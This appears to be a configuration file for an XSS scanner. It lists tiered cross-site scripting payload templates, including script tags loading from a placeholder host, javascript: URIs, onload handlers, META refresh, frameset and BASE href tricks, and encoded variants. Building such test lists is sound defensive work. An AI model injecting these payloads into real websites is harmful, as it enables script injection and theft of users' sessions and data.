xss.fake_ip_address = 123.321.1.1
xss.fake_hostname = notreal.fake
xss.javascript_method = testXSS

xss.simple_base_attacks = \
		<script src=http://${xss.fake_hostname}/%%token%%>, \
		<script>${xss.javascript_method}('%%token%%')</script>

xss.medium_base_attacks = \
		<IMG """><script src=http://${xss.fake_hostname}/%%token%%>, \
		<img src=JavaScript:${xss.javascript_method}('%%token%%')>, \
		<body onload=${xss.javascript_method}('%%token%%'), \
		<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:${xss.javascript_method}('%%token%%');">, \
		<SCRIPT SRC=//${xss.fake_hostname}/.%%token%%>, \
		<FRAMESET><FRAME SRC="javascript:${xss.javascript_method}('%%token%%');"></FRAMESET>, \
		<SCRIPT>a=/%%token%%/\n${xss.javascript_method}(a.source)</SCRIPT>
		
xss.advanced_base_attacks = \
		<IMG SRC=javascript:${xss.javascript_method}(String.fromCharCode(%%decimal_comma_token%%))>, \
		<IMG SRC=%%html_encoded_method_token%%>, \
		<SCRIPT/TEXT src=%%html_encoded_script_path_token%%</SCRIPT>, \
		<BASE href=http://${xss.fake_hostname}/%%token%%>
		
		